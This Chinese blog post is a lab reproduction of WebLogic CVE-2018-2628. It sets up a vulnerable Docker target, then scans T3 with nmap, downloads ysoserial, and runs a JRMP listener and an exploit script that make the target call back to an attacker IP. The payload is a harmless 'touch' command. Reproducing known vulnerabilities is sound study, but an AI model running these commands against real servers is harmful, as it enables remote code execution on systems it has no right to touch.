CVE-2018-2628

環(huán)境搭建

 weblogic靶機(jī):
      docker pull zhiqzhao/ubuntu_weblogic1036_domain
      docker images
      docker run -d -p7001:7001 zhiqzhao/ubuntu_weblogic1036_domain 

 攻擊的服務(wù)器:
       java + python2環(huán)境即可

  docker學(xué)習(xí)筆記: https://www.evernote.com/shard/s461/sh/bc38ea4c-3bfe-4321-ab3c-1742f69998e4/4e371b210ab3b23e9df415f54dadaabb

漏洞利用

在windows上執(zhí)行exploit,返回?cái)?shù)據(jù)二進(jìn)制會(huì)在cmd中報(bào)錯(cuò),但是命令是可以執(zhí)行成功的,Linux下是沒有報(bào)錯(cuò)的。
攻擊機(jī)執(zhí)行命令:
nmap -sV --script=weblogic-t3-info -Pn 120.77.253.216 -p7001
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1  'touch /tmp/zhenxin'
python cve-2018-2628.py 120.77.253.216 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 122.152.233.180 1099 JRMPClient2
image.png

image.png

image.png

漏洞原理

明天補(bǔ)。

參考文章

https://blog.csdn.net/archersaber39/article/details/80135463#t0

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

推薦閱讀更多精彩內(nèi)容

  • Android 自定義View的各種姿勢(shì)1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 173,155評(píng)論 25 708
  • 在此特此聲明:一下所有鏈接均來自互聯(lián)網(wǎng),在此記錄下我的查閱學(xué)習(xí)歷程,感謝各位原創(chuàng)作者的無私奉獻(xiàn) ! 技術(shù)一點(diǎn)一點(diǎn)積...
    遠(yuǎn)航的移動(dòng)開發(fā)歷程閱讀 11,213評(píng)論 12 197
  • Android(2017-2018)BAT面試題整理(Android篇,含答案) 版權(quán)聲明:本文為博主原創(chuàng)文章,未...
    nic啟立閱讀 30,503評(píng)論 11 471
  • 焦點(diǎn)網(wǎng)絡(luò)初期七期 平瑞青 堅(jiān)持分享第203天(2018.3.20)周二 昨晚安頓好老媽睡覺后,趕緊打開手機(jī)進(jìn)入信陽...
    平凡也好閱讀 133評(píng)論 0 0
  • 年末的一份總結(jié),好像一切來的剛剛好。如果你有幸點(diǎn)開了,就與我有故事可說 明信片收到了,你看,在這里 微信和你聊天,...
    Promise姍閱讀 456評(píng)論 0 0